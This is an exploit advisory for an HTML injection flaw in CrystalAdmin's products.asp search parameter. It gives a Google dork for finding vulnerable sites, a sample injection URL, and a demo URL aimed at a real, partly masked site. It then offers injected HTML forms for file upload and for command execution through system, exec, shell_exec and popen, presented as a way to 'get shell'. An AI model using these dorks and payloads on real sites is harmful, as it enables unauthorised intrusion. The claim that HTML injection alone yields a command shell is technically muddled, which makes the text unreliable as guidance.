#################################################################
=> Title: CrystalAdmin Html Injection Vulnerability
=> Author: silent
=> Credit: Rainarmy Security Team
=> Email: hacker.silent23@yahoo.com
##################################################################
=> Dork: inurl:/catalogue/products.asp?s=
=> Sample: http://www.target.com/catalogue/products.asp?s=[Html code]
=> Demo: http://www.aiXXXe.co.uk/catalogue/products.asp?s=[html code]
=> Html code: such az => <marquee>html injection</marquee>
###################################################################
=> for getting shell with html inject you should inject shell
with html code such as this:
<form action="?dir=." method="POST" enctype="multipart/form-data">
<tr>
<td>Uploud file:<input name="uploadfile" value="" type="file" class="input" size="30" >
<input name="doupfile" value="up" type="submit" class="input" size="30" >
<input name="uploaddir" value="." type="hidden" class="input" size="30" >
</td>
</tr>
</form>
or an cmd shell like this :
<form action="" method="POST" >
<tr>
<td>cmd:<select class="input" name="execfunc" >
<option value="system">system</option><option value="passthru">passthru</option>
<option value="exec">exec</option><option value="shell_exec">shell_exec</option>
<option value="popen">popen</option></select>
<input name="command" value="" type="text" class="input" size="30" >
<input name="Run" value="command" type="submit" class="input" size="30" >
</td>
</tr>
</form>
also this trick works , when the safe mode is off.
###################################################################
special thank to administrator , Data War , Time outer
###################################################################
wwww.rainarmy.com & www.rainarmy.com/forums
###################################################################